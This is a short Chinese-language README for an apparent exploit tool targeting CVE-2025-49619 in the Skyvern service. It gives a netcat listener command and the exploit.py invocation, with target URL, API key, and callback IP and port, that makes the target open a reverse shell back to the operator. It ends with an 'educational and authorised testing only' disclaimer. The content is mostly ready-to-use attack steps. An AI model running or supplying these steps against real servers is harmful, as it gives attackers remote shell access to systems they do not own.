该脚本利用 Skyvern 中的 CVE-2025-49619 漏洞执行反弹 shell 命令。
nc -lvnp <PORT>
python3 exploit.py -u "http://<TARGET_IP>:<TARGET_PORT>" -k "<X-API-KEY>" -i <LOCAL_IP> -p <PORT>
<TARGET_IP>:Skyvern 服务器 IP<TARGET_PORT>:Skyvern 服务器端口<X-API-KEY>:你的 Skyvern API 密钥(设置 → API 密钥)<LOCAL_IP>:用于接收反弹 shell 的你的 IP<PORT>:反弹 shell 端口(必须与你的监听器一致)免责声明:
此代码仅用于教育和授权测试目的。